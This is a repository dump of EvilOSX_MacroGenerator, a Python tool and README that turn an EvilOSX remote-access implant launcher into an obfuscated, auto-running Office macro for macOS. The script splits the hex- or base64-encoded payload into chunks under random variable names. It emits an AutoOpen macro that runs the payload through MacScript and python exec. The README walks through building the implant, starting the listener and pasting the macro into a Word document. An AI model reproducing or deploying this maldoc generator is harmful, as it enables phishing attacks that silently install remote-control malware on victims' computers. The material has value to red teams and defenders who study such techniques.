├── EvilOSX-macrogenerator.py ├── LICENSE ├── README.md └── screenshot1.jpg /EvilOSX-macrogenerator.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | from optparse import OptionParser 3 | import sys 4 | import base64 5 | import binascii 6 | import os 7 | import random 8 | from random import randrange 9 | 10 | if ((len(sys.argv) < 5 or len(sys.argv) > 5) and '-h' not in sys.argv): 11 | print("Usage: python3 %s -p -e [\"hex\" or \"b64\"]" % sys.argv[0]) 12 | sys.exit(1) 13 | 14 | parser = OptionParser() 15 | parser.add_option("-p", "--payload", help="EvilOSX python payload") 16 | parser.add_option("-e", "--encoding", help="Type of encoding (hex or base64)") 17 | (options, args) = parser.parse_args() 18 | 19 | payload = options.payload 20 | encoding = options.encoding 21 | 22 | if os.path.exists(payload): 23 | rowcount = randrange(40,60) 24 | with open('%s'%payload, 'r') as file: 25 | data = file.read() 26 | data = data.replace("subprocess.Popen(\"rm -rf \" + __file__, shell=True)","") 27 | 28 | if encoding == "hex": 29 | data2 = binascii.hexlify(data.encode('utf-8')) 30 | elif encoding == "b64": 31 | data2 = base64.b64encode(data.encode('utf-8')) 32 | else: 33 | print("Unsupported encoding option entered. Use -e hex or -e b64. 
Exiting") 34 | sys.exit(1) 35 | 36 | macrofile = open('macro.txt', 'w') 37 | macrofile.write('Sub AutoOpen()\n') 38 | macrofile.write("a = \"p\" + \"yth\" + \"on\"\n") 39 | macrofile.write("b = \"e\" + \"x\" + \"e\" + \"c\"\n") 40 | macrofile.write("") 41 | 42 | initializer = 0 43 | totallength = len(data2) 44 | chars = 'abcdef' 45 | varname = ''.join(random.choices(chars, k=8)) 46 | while totallength > 0: 47 | if initializer == 0: 48 | int1 = rowcount*initializer 49 | int2 = rowcount + int1 50 | text2 = data2[int1:int2].decode('utf8') 51 | macrofile.write("%s = \"%s\"\n" % (varname,text2)) 52 | totallength = totallength - rowcount 53 | initializer = initializer + 1 54 | else: 55 | int3 = rowcount*initializer 56 | int4 = rowcount + int3 57 | text3 = data2[int3:int4].decode('utf8') 58 | macrofile.write("%s = %s + \"%s\"\n" % (varname,varname,text3)) 59 | totallength = totallength - rowcount 60 | initializer = initializer + 1 61 | 62 | if encoding == "hex": 63 | macro = "MacScript (\"do shell script \"\"\" & a & \" -c \\\"\"import base64,binascii,sys,socket,commands,os,ssl;\" & b & \"(binascii.unhexlify({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('\" & %s & \"')))\\\"\" &> /dev/null \"\"\")\n" % varname 64 | elif encoding == "b64": 65 | macro = "MacScript (\"do shell script \"\"\" & a & \" -c \\\"\"import base64,binascii,sys,socket,commands,os,ssl;\" & b & \"(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('\" & %s & \"')))\\\"\" &> /dev/null \"\"\")\n" % varname 66 | macrofile.write(macro) 67 | macrofile.write("End Sub\n") 68 | macrofile.close() 69 | 70 | print("-"*100) 71 | print("Happy hunting!") 72 | print('') 73 | print("EvilOSX macro was written to macro.txt in the current working directory. Simply copy it and paste it into your Office document of choice.") 74 | print("DONE!") 75 | 76 | else: 77 | print("[-] File path not found! 
Exiting") 78 | sys.exit(1) 79 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Cedric Owens 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # EvilOSX_MacroGenerator 2 | Python3 script to generate Office macros for the EvilOSX framework (https://github.com/Marten4n6/EvilOSX) 3 | 4 | This script reads in an EvilOSX Python launcher and creates a macro with either base64 encoding or hex encoding (based on the command line option specified). Therefore, you will need to pull down EvilOSX and have it drop the Python launcher before running the macro generator. See the steps below. 5 | 6 | General usage: 7 | 8 | **python3 EvilOSX-macrogenerator.py -p -e <"hex" or "b64">** 9 | 10 | Steps: 11 | 12 | 1. Clone the EvilOSX repo (https://github.com/Marten4n6/EvilOSX) 13 | 2. Install EvilOSX requirements (from EvilOSX root folder: $**sudo pip install -r requirements.txt**) 14 | 3. Generate an EvilOSX Python launcher (from EvilOSX root folder: $**python start.py --builder**). Be sure to select the Python launcher 15 | 4. Note the path where the Python launcher is dropped (by default in the /data/builds directory within the EvilOSX root folder) 16 | 5. Start the EvilOSX listener (**python start.py --cli --port **) 17 | 6. Run the macro generator from this repo: **python3 EvilOSX-macrogenerator.py -p -e ["hex" or "b64"]**. Use the path from step 4 above for the -p option here 18 | 7. The macro generator will read the EvilOSX Python payload, encode it as either base64 or hex (based on the option you enter), and write the output to a file: 19 | ![Image](screenshot1.jpg) 20 | 8. 
Copy the contents of macro.txt into an Office doc (Tools -> Macro -> Macros In: [select the document name] -> Enter macro name -> Click plus button -> paste macro contents -> for Word save as .doc or .docm) 21 | 22 | -------------------------------------------------------------------------------- /screenshot1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cedowens/EvilOSX_MacroGenerator/f6aa4da13bf9ad9c1179909036565153f69d601c/screenshot1.jpg --------------------------------------------------------------------------------